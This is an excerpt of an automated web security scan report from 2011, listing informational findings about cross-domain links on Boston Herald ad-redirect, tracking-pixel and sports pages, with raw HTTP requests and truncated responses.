Cookie: __utmz=235728274.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); OAX=rcHW801DO8kADVvc; __utma=235728274.1370509941.1296251844.1296251844.1296251844.1; __utmc=235728274; NSC_d12efm_qppm_iuuq=ffffffff09419e5f45525d5f4f58455e445a4a423660; __qca=P0-1247593866-1296251843767; __utmb=235728274.170.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m;

Response

HTTP/1.1 302 Found
Date: Sat, 29 Jan 2011 05:07:49 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://a.collective-media.net/jump/q1.bosherald/ent_fr;sz=300x250;click0=http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/track/home/L35/269011797/Middle/BostonHerald/quadrant1_entHP300x250a_2010/quadrant1_edgeHP300x250a_0608.html/72634857383031444f386b4144567663?;ord=269011797?
Content-Length: 595
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://a.collective-media.net/jump/q1.bosherald/ent_fr;sz=300x250;click0=http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/track/home/L35/269011797/Middle/BostonHerald/quadrant1_entHP300x250a_2010/quadrant1_edgeHP300x250a_0608.html/72634857383031444f386b4144567663?;ord=269011797?">here</a>
...[SNIP]...

17.243. http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/track/home/L35/371110779/Top/BostonHerald/BostonBlazers_ROS_728x90/heraldleaderboard.jpg/72634857383031444f386b4144567663

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oascentral.bostonherald.com
Path:   /RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/track/home/L35/371110779/Top/BostonHerald/BostonBlazers_ROS_728x90/heraldleaderboard.jpg/72634857383031444f386b4144567663

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following link to another domain:

Request

GET /RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/track/home/L35/371110779/Top/BostonHerald/BostonBlazers_ROS_728x90/heraldleaderboard.jpg/72634857383031444f386b4144567663?x HTTP/1.1
Host: oascentral.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=235728274.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); OAX=rcHW801DO8kADVvc; __utma=235728274.1370509941.1296251844.1296251844.1296251844.1; __utmc=235728274; NSC_d12efm_qppm_iuuq=ffffffff09419e5f45525d5f4f58455e445a4a423660; __qca=P0-1247593866-1296251843767; __utmb=235728274.170.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m;

Response

HTTP/1.1 302 Found
Date: Sat, 29 Jan 2011 05:08:49 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.ticketmaster.com/Boston-Blazers-tickets/artist/821857
Content-Length: 342
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.ticketmaster.com/Boston-Blazers-tickets/artist/821857">here</a>
...[SNIP]...

17.244. http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/track/home/L35/395221226/Middle/BostonHerald/quadrant1_entROS300x250a_2010/quadrant1_edgeROS300x250a_0608.html/72634857383031444f386b4144567663

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oascentral.bostonherald.com
Path:   /RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/track/home/L35/395221226/Middle/BostonHerald/quadrant1_entROS300x250a_2010/quadrant1_edgeROS300x250a_0608.html/72634857383031444f386b4144567663

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following link to another domain:

Request

GET /RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/track/home/L35/395221226/Middle/BostonHerald/quadrant1_entROS300x250a_2010/quadrant1_edgeROS300x250a_0608.html/72634857383031444f386b4144567663?http://a.collective-media.net/jump/q1.bosherald/ent;sz=300x250;click0=http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/track/home/L35/395221226/Middle/BostonHerald/quadrant1_entROS300x250a_2010/quadrant1_edgeROS300x250a_0608.html/72634857383031444f386b4144567663?;ord=395221226? HTTP/1.1
Host: oascentral.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=235728274.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); OAX=rcHW801DO8kADVvc; __utma=235728274.1370509941.1296251844.1296251844.1296251844.1; __utmc=235728274; NSC_d12efm_qppm_iuuq=ffffffff09419e5f45525d5f4f58455e445a4a423660; __qca=P0-1247593866-1296251843767; __utmb=235728274.170.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m;

Response

HTTP/1.1 302 Found
Date: Sat, 29 Jan 2011 05:07:58 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://a.collective-media.net/jump/q1.bosherald/ent;sz=300x250;click0=http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/track/home/L35/395221226/Middle/BostonHerald/quadrant1_entROS300x250a_2010/quadrant1_edgeROS300x250a_0608.html/72634857383031444f386b4144567663?;ord=395221226?
Content-Length: 594
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://a.collective-media.net/jump/q1.bosherald/ent;sz=300x250;click0=http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/track/home/L35/395221226/Middle/BostonHerald/quadrant1_entROS300x250a_2010/quadrant1_edgeROS300x250a_0608.html/72634857383031444f386b4144567663?;ord=395221226?">here</a>
...[SNIP]...

17.245. http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/track/home/L35/454587819/Middle1/BostonHerald/quadrant1_entROS300x250b_2010/quadrant1_entROS300x250b_2010.html/72634857383031444f386b4144567663

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oascentral.bostonherald.com
Path:   /RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/track/home/L35/454587819/Middle1/BostonHerald/quadrant1_entROS300x250b_2010/quadrant1_entROS300x250b_2010.html/72634857383031444f386b4144567663

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following link to another domain:

Request

GET /RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/track/home/L35/454587819/Middle1/BostonHerald/quadrant1_entROS300x250b_2010/quadrant1_entROS300x250b_2010.html/72634857383031444f386b4144567663?http://a.collective-media.net/jump/q1.bosherald/be_ent;sz=300x250;click0=http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/track/home/L35/454587819/Middle1/BostonHerald/quadrant1_entROS300x250b_2010/quadrant1_entROS300x250b_2010.html/72634857383031444f386b4144567663?;ord=454587819? HTTP/1.1
Host: oascentral.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=235728274.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); OAX=rcHW801DO8kADVvc; __utma=235728274.1370509941.1296251844.1296251844.1296251844.1; __utmc=235728274; NSC_d12efm_qppm_iuuq=ffffffff09419e5f45525d5f4f58455e445a4a423660; __qca=P0-1247593866-1296251843767; __utmb=235728274.170.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m;

Response

HTTP/1.1 302 Found
Date: Sat, 29 Jan 2011 05:08:36 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://a.collective-media.net/jump/q1.bosherald/be_ent;sz=300x250;click0=http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/track/home/L35/454587819/Middle1/BostonHerald/quadrant1_entROS300x250b_2010/quadrant1_entROS300x250b_2010.html/72634857383031444f386b4144567663?;ord=454587819?
Content-Length: 597
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://a.collective-media.net/jump/q1.bosherald/be_ent;sz=300x250;click0=http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/track/home/L35/454587819/Middle1/BostonHerald/quadrant1_entROS300x250b_2010/quadrant1_entROS300x250b_2010.html/72634857383031444f386b4144567663?;ord=454587819?">here</a>
...[SNIP]...

17.246. http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/track/home/L35/710762294/Middle1/BostonHerald/quadrant1_entHP300x250b_2010/quadrant1_entHP300x250b_2010.html/72634857383031444f386b4144567663

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oascentral.bostonherald.com
Path:   /RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/track/home/L35/710762294/Middle1/BostonHerald/quadrant1_entHP300x250b_2010/quadrant1_entHP300x250b_2010.html/72634857383031444f386b4144567663

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following link to another domain:

Request

GET /RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/track/home/L35/710762294/Middle1/BostonHerald/quadrant1_entHP300x250b_2010/quadrant1_entHP300x250b_2010.html/72634857383031444f386b4144567663?http://a.collective-media.net/jump/q1.bosherald/be_ent_fr;sz=300x250;click0=http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/track/home/L35/710762294/Middle1/BostonHerald/quadrant1_entHP300x250b_2010/quadrant1_entHP300x250b_2010.html/72634857383031444f386b4144567663?;ord=710762294? HTTP/1.1
Host: oascentral.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=235728274.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); OAX=rcHW801DO8kADVvc; __utma=235728274.1370509941.1296251844.1296251844.1296251844.1; __utmc=235728274; NSC_d12efm_qppm_iuuq=ffffffff09419e5f45525d5f4f58455e445a4a423660; __qca=P0-1247593866-1296251843767; __utmb=235728274.170.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m;

Response

HTTP/1.1 302 Found
Date: Sat, 29 Jan 2011 05:08:29 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://a.collective-media.net/jump/q1.bosherald/be_ent_fr;sz=300x250;click0=http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/track/home/L35/710762294/Middle1/BostonHerald/quadrant1_entHP300x250b_2010/quadrant1_entHP300x250b_2010.html/72634857383031444f386b4144567663?;ord=710762294?
Content-Length: 598
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://a.collective-media.net/jump/q1.bosherald/be_ent_fr;sz=300x250;click0=http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/track/home/L35/710762294/Middle1/BostonHerald/quadrant1_entHP300x250b_2010/quadrant1_entHP300x250b_2010.html/72634857383031444f386b4144567663?;ord=710762294?">here</a>
...[SNIP]...

17.247. http://pixel.invitemedia.com/rubicon_sync

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.invitemedia.com
Path:   /rubicon_sync

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following link to another domain:

Request

GET /rubicon_sync?publisher_user_id=004826d0e57cb7385266145a629ee0301cc82296&publisher_dsp_id=2101&publisher_call_type=iframe&publisher_redirecturl=http://tap.rubiconproject.com/oz/feeds/invite-media-rtb/tokens/ HTTP/1.1
Host: pixel.invitemedia.com
Proxy-Connection: keep-alive
Referer: http://assets.rubiconproject.com/static/rtb/sync-min.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=82d726c3-44ee-407c-85c4-39a0b0fc11ef; exchange_uid="eyI0IjpbIkNBRVNFSk81T0hYNWxOR0lITDdmRUVFSjQtWSIsNzM0MTUxXX0="; io_frequency="{\"8866\": [0+ 0+ 1296072684+ 1+ 1296072684+ 1]+ \"8733\": [0+ 0+ 1295634039+ 1+ 1295634039+ 1]}"; impressions="{\"429622\": [1295634039+ \"94ea05fe-2d4a-3bf7-a98e-3964b49408cd\"+ 83803+ 56236+ 46]+ \"417817\": [1296072684+ \"5b6de59f-cbbc-3ba4-8c51-0a4d6d7a0ec7\"+ 8863+ 40494+ 9173]}"; frequency="{\"429622\": [1295893239+ 1+ 1295634039+ 1+ 1295634039+ 1]+ \"417817\": [1297368684+ 1+ 1296072684+ 1+ 1296072684+ 1]}"; subID="{}"; dp_rec="{\"3\": 1296072684+ \"2\": 1295634039}"; segments="3391|3392|11262|11265|17277|38781|38582,1298044270|10102"

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Fri, 28 Jan 2011 14:48:45 GMT
P3P: policyref="/w3c/p3p.xml", CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Expires: Fri, 28-Jan-2011 14:48:25 GMT
Content-Type: text/html
Pragma: no-cache
Cache-Control: no-cache
Content-Length: 221

<html><body><img width="0" height="0" src="http://tap.rubiconproject.com/oz/feeds/invite-media-rtb/tokens/?publisher_dsp_id=2101&external_user_id=82d726c3-44ee-407c-85c4-39a0b0fc11ef&Expiration=1296658125"/></body>
...[SNIP]...

17.248. http://pixel.invitemedia.com/rubicon_sync

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.invitemedia.com
Path:   /rubicon_sync

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following link to another domain:

Request

GET /rubicon_sync?publisher_user_id=004826d0e57cb7385266145a629ee0301cc82296&publisher_dsp_id=2101&publisher_call_type=iframe&publisher_redirecturl=http://tap.rubiconproject.com/oz/feeds/invite-media-rtb/tokens/ HTTP/1.1
Host: pixel.invitemedia.com
Proxy-Connection: keep-alive
Referer: http://assets.rubiconproject.com/static/rtb/sync-min.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=82d726c3-44ee-407c-85c4-39a0b0fc11ef; exchange_uid="eyI0IjpbIkNBRVNFSk81T0hYNWxOR0lITDdmRUVFSjQtWSIsNzM0MTUxXX0="; io_frequency="{\"8866\": [0+ 0+ 1296072684+ 1+ 1296072684+ 1]+ \"8733\": [0+ 0+ 1295634039+ 1+ 1295634039+ 1]}"; impressions="{\"429622\": [1295634039+ \"94ea05fe-2d4a-3bf7-a98e-3964b49408cd\"+ 83803+ 56236+ 46]+ \"417817\": [1296072684+ \"5b6de59f-cbbc-3ba4-8c51-0a4d6d7a0ec7\"+ 8863+ 40494+ 9173]}"; frequency="{\"429622\": [1295893239+ 1+ 1295634039+ 1+ 1295634039+ 1]+ \"417817\": [1297368684+ 1+ 1296072684+ 1+ 1296072684+ 1]}"; subID="{}"; dp_rec="{\"3\": 1296072684+ \"2\": 1295634039}"; segments="3391|3392|11262|11265|17277|38781|38582,1298044270|10102"

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Fri, 28 Jan 2011 16:59:35 GMT
P3P: policyref="/w3c/p3p.xml", CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Expires: Fri, 28-Jan-2011 16:59:15 GMT
Content-Type: text/html
Pragma: no-cache
Cache-Control: no-cache
Content-Length: 221

<html><body><img width="0" height="0" src="http://tap.rubiconproject.com/oz/feeds/invite-media-rtb/tokens/?publisher_dsp_id=2101&external_user_id=82d726c3-44ee-407c-85c4-39a0b0fc11ef&Expiration=1296665975"/></body>
...[SNIP]...

17.249. http://scores.heraldinteractive.com/merge/tsnform.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://scores.heraldinteractive.com
Path:   /merge/tsnform.aspx

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /merge/tsnform.aspx?c=bostonherald&page=mlb/teams/028/schedule.aspx?team=028,season= HTTP/1.1
Host: scores.heraldinteractive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Sat, 29 Jan 2011 05:21:36 GMT
X-Powered-By: ASP.NET
Connection: close
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=q0fm5255ct1r00ncq153f045; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 56954

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
<title>Sports - BostonHerald.c
...[SNIP]...
</style>


<link rel="alternate" title="Sports - BostonHerald.com" href="http://feeds.feedburner.com/bostonherald/sports/" type="application/rss+xml">
<script type="text/javascript" language="JavaScript">
...[SNIP]...
<div id="headerLogo">
<a href="http://www.bostonherald.com/"><img src="http://cache.heraldinteractive.com/images/siteImages/edge/edgeBlank.gif" width="242" height="90">
...[SNIP]...
<div id="home" class="tab" onmouseover="this.className = this.className + 'Hover'; return false;" onmouseout="this.className = this.className.replace('Hover', ''); return false;" onclick=""><a href="http://www.bostonherald.com/sports/"><a href="http://www.bostonherald.com/homepage.bg">Home</a>
...[SNIP]...
<div id="news" class="tab" onmouseover="this.className = this.className + 'Hover'; return false;" onmouseout="this.className = this.className.replace('Hover', ''); return false;" onclick=""><a href="http://www.bostonherald.com/news/">News &amp; Opinion</a>
...[SNIP]...
<div id="sports" class="tabSelected"><a href="http://www.bostonherald.com/sports/">Sports</a>
...[SNIP]...
<div id="entertainment" class="tab" onmouseover="this.className = this.className + 'Hover'; return false;" onmouseout="this.className = this.className.replace('Hover', ''); return false;" onclick=""><a href="http://www.bostonherald.com/entertainment/">Entertainment</a>
...[SNIP]...
<div id="business" class="tab" onmouseover="this.className = this.className + 'Hover'; return false;" onmouseout="this.className = this.className.replace('Hover', ''); return false;" onclick=""><a href="http://www.bostonherald.com/business/">Business</a>
...[SNIP]...
<div id="inside" class="tab" onmouseover="this.className = this.className + 'Hover'; return false;" onmouseout="this.className = this.className.replace('Hover', ''); return false;" onclick=""><a href="http://www.bostonherald.com/track/">Inside Track</a>
...[SNIP]...
<div id="blogs" class="tab" onmouseover="this.className = this.className + 'Hover'; return false;" onmouseout="this.className = this.className.replace('Hover', ''); return false;" onclick=""><a href="http://www.bostonherald.com/blogs/">Blogs</a>
...[SNIP]...
<div id="media" class="tab" onmouseover="this.className = this.className + 'Hover'; return false;" onmouseout="this.className = this.className.replace('Hover', ''); return false;" onclick=""><a href="http://www.bostonherald.com/mediacenter">Photos &amp; Media</a>
...[SNIP]...
div id="carfind" class="tabAlternate" onmouseover="this.className = this.className + 'Hover'; return false;" onmouseout="this.className = this.className.replace('Hover', ''); return false;" onclick=""><a href="http://www.carfind.com/"><img src="http://cache.heraldinteractive.com/images/siteImages/header/headerNavBarBullet.gif" alt="Carfind">
...[SNIP]...
iv id="homefind" class="tabAlternate" onmouseover="this.className = this.className + 'Hover'; return false;" onmouseout="this.className = this.className.replace('Hover', ''); return false;" onclick=""><a href="http://www.homefind.com/"><img src="http://cache.heraldinteractive.com/images/siteImages/header/headerNavBarBullet.gif" alt="Homefind">
...[SNIP]...
div id="jobfind" class="tabAlternate" onmouseover="this.className = this.className + 'Hover'; return false;" onmouseout="this.className = this.className.replace('Hover', ''); return false;" onclick=""><a href="http://www.bostonherald.com/jobfind/"><img src="http://cache.heraldinteractive.com/images/siteImages/header/headerNavBarBullet.gif" alt="Jobfind">
...[SNIP]...
<li class="SubNavMain"><a href="http://www.bostonherald.com/sports/baseball/">Red Sox &amp; MLB</a>
...[SNIP]...
<li class="SubNavMain"><a href="http://www.bostonherald.com/sports/football/">Patriots &amp; NFL</a>
...[SNIP]...
<li class="SubNavMain"><a href="http://www.bostonherald.com/sports/basketball/">Celtics &amp; NBA</a>
...[SNIP]...
<li class="SubNavMain"><a href="http://www.bostonherald.com/sports/hockey/">Bruins &amp; NHL</a>
...[SNIP]...
<li class="SubNavMain"><a href="http://www.bostonherald.com/sports/college/">College</a>
...[SNIP]...
<li class="SubNavMain"><a href="http://www.bostonherald.com/sports/columnists/">Columnists</a>
...[SNIP]...
<li class="SubNavMain"><a href="http://www.bostonherald.com/sports/soccer/">Revolution &amp; Soccer</a>
...[SNIP]...
<li class="SubNavMain"><a href="http://www.bostonherald.com/sports/golf/">Golf</a>

</li>
<li class="SubNavMain"><a href="http://www.bostonherald.com/sports/high_school/">High School</a>
...[SNIP]...
<li class="SubNavMain"><a href="http://www.bostonherald.com/sports/other_sports/">Other</a>
...[SNIP]...
<p class="tsnid">Powered by <a href="http://www.sportsnetwork.com" target="_blank">The Sports Network</A>
...[SNIP]...
<h1><a href="http://www.bostonherald.com/blogs/">Blogs</a>
...[SNIP]...
<h2><a href="http://www.bostonherald.com/blogs/sports/">Sports Blogs</a>
...[SNIP]...
<h2><a href="http://www.bostonherald.com/blogs/news/">News &amp; Business Blogs</a>
...[SNIP]...
<h2><a href="http://www.bostonherald.com/blogs/entertainment/">Entertainment Blogs</a>
...[SNIP]...
<h1><a href="http://www.bostonherald.com/news/">News &amp; Opinion</a>
...[SNIP]...
<h2><a href="http://www.bostonherald.com/news/regional/">Local Coverage</a>
...[SNIP]...
<h2><a href="http://www.bostonherald.com/news/politics/">Local Politics</a>
...[SNIP]...
<h2><a href="http://www.bostonherald.com/news/columnists/">Columnists</a>
...[SNIP]...
<h2><a href="http://www.bostonherald.com/news/opinion/">Opinion</a>
...[SNIP]...
<h2><a href="http://www.bostonherald.com/news/national/">National</a>
...[SNIP]...
<h2><a href="http://www.bostonherald.com/news/us_politics/">U.S. Politics</a>
...[SNIP]...
<h2><a href="http://www.bostonherald.com/news/international/">International</a>
...[SNIP]...
<h2><a href="http://www.bostonherald.com/news/offbeat/">Offbeat News</a>
...[SNIP]...
<h2><a href="http://www.bostonherald.com/news/obituaries/">Obituaries&nbsp;</a>
...[SNIP]...
<h1><a href="http://www.bostonherald.com/sports/">Sports</a>
...[SNIP]...
<h2><a href="http://www.bostonherald.com/sports/baseball/">Red Sox &amp; MLB</a>
...[SNIP]...
<h2><a href="http://www.bostonherald.com/sports/football/">Patriots &amp; NFL</a>
...[SNIP]...
<h2><a href="http://www.bostonherald.com/sports/basketball/">Celtics &amp; NBA</a>
...[SNIP]...
<h2><a href="http://www.bostonherald.com/sports/hockey/">Bruins &amp; NHL</a>
...[SNIP]...
<h2><a href="http://www.bostonherald.com/sports/college/">College</a>
...[SNIP]...
<h2><a href="http://www.bostonherald.com/sports/soccer/">Revolution &amp; Soccer</a>
...[SNIP]...
<h2><a href="http://www.bostonherald.com/sports/golf/">Golf</a>
...[SNIP]...
<h2><a href="http://www.bostonherald.com/sports/columnists/">Columnists</a>
...[SNIP]...
<h2><a href="http://www.bostonherald.com/sports/high_school/">High School</a>
...[SNIP]...
<h2><a href="http://www.bostonherald.com/sports/other_sports/">Other</a>
...[SNIP]...
<h1><a href="http://www.bostonherald.com/entertainment/">Entertainment</a>
...[SNIP]...
<h2><a href="http://www.bostonherald.com/entertainment/arts_culture/">Arts &amp; Culture</a>
...[SNIP]...
<h2><a href="http://www.bostonherald.com/entertainment/movies/">Movies</a>
...[SNIP]...
<h2><a href="http://www.bostonherald.com/entertainment/music/">Music</a>
...[SNIP]...
<h2><a href="http://www.bostonherald.com/entertainment/food_dining/">Food &amp; Dining</a>
...[SNIP]...
<h2><a href="http://www.bostonherald.com/entertainment/health/">Health &amp; Fitness</a>
...[SNIP]...
<h2><a href="http://www.bostonherald.com/entertainment/travel/">Travel</a>
...[SNIP]...
<h2><a href="http://www.bostonherald.com/entertainment/lifestyle/">Lifestyle</a>
...[SNIP]...
<h2><a href="http://www.bostonherald.com/entertainment/fashion/">Style &amp; Fashion</a>
...[SNIP]...
<h2><a href="http://www.bostonherald.com/entertainment/television/">Television</a>
...[SNIP]...
<h2><a href="http://www.bostonherald.com/entertainment/books/">Books</a>
...[SNIP]...
<h1><a href="http://www.bostonherald.com/track/">Inside Track</a>
...[SNIP]...
<h2><a href="http://www.bostonherald.com/track/inside_track/">The Inside Track</a>
...[SNIP]...
<h2><a href="http://www.bostonherald.com/track/star_tracks/">Star Tracks</a>
...[SNIP]...
<h2><a href="http://www.bostonherald.com/track/celebrity/">Celebrity News</a>
...[SNIP]...
<h1><a href="http://www.bostonherald.com/business/">Business</a>
...[SNIP]...
<h2><a href="http://www.bostonherald.com/business/general/">Business &amp; Markets</a>
...[SNIP]...
<h2><a href="http://www.bostonherald.com/business/real_estate/">Real Estate</a>
...[SNIP]...
<h2><a href="http://www.bostonherald.com/business/media/">Media &amp; Marketing</a>
...[SNIP]...
<h2><a href="http://www.bostonherald.com/business/technology/">Technology</a>
...[SNIP]...
<h2><a href="http://www.bostonherald.com/business/healthcare/">Healthcare</a>
...[SNIP]...
<h2><a href="http://www.bostonherald.com/business/automotive/">Automotive</a>
...[SNIP]...
<h2><a href="http://www.bostonherald.com/business/womens/">Women&acute;s Business</a>
...[SNIP]...
<h2><a href="http://www.carfind.com/">Carfind</a>
...[SNIP]...
<h2><a href="http://www.homefind.com/">Homefind</a>
...[SNIP]...
<h2><a href="http://www.bostonherald.com/jobfind/">Jobfind</a>
...[SNIP]...
<h2><a href="http://www.bostonherald.com/jobfind/">Personals</a>
...[SNIP]...
<h2><a href="http://www.bostonherald.com/crossword/">Crossword</a>
...[SNIP]...
<h2><a href="http://www.collegeanduniversity.net/herald/">Education Channel</a>
...[SNIP]...
<h2><a href="http://www.bostonherald.com/lottery">Lottery Results</a>
...[SNIP]...
<h2><a href="http://www.uclick.com/client/boh/sudoc/" target=_new">Play Sudoku!</a>
...[SNIP]...
</div>

<a class="orange" href="http://www.bostonherald.com/about/contact/">Contact us</a>&nbsp;&nbsp;|&nbsp;&nbsp;
<a class="orange" href="http://www.bostonherald.com/mediakit/print/">Print advertising</a>&nbsp;&nbsp;|&nbsp;&nbsp;
<a class="orange" href="http://www.bostonherald.com/mediakit/online/">Online advertising</a>&nbsp;&nbsp;|&nbsp;&nbsp;

<a class="orange" href="http://www.bostonherald.com/mediacenter/history/">Herald history</a>&nbsp;&nbsp;|&nbsp;&nbsp;
<a class="orange" href="http://www.bostonherald.com/about/contact/news_tip.bg">Send a news tip</a>&nbsp;&nbsp;|&nbsp;&nbsp;
<a class="orange" href="http://bostonherald.newspaperdirect.com" target="_new">Electronic edition</a>&nbsp;&nbsp;|&nbsp;&nbsp;
<a class="orange" href="http://www.bostonherald.com/mediacenter/browser/">Browser upgrade</a>&nbsp;&nbsp;|&nbsp;&nbsp;
<a class="orange" href="http://www.bostonherald.com/about/home_delivery/">Home delivery</a>&nbsp;&nbsp;|&nbsp;&nbsp;

<a class="orange" href="http://www.bostonherald.com/wireless">Mobile Edition</a>
...[SNIP]...
<br/>
No portion of BostonHerald.com or its content may be reproduced without the owner's written permission. <a href="http://www.heraldmedia.com/privacy.html">Privacy Commitment</a>
...[SNIP]...
</div>

<script language="JavaScript1.1" src="http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/sports/home@x01!x01"></script>
...[SNIP]...
</script>

<script type="text/javascript"
src="http://edge.quantserve.com/quant.js">
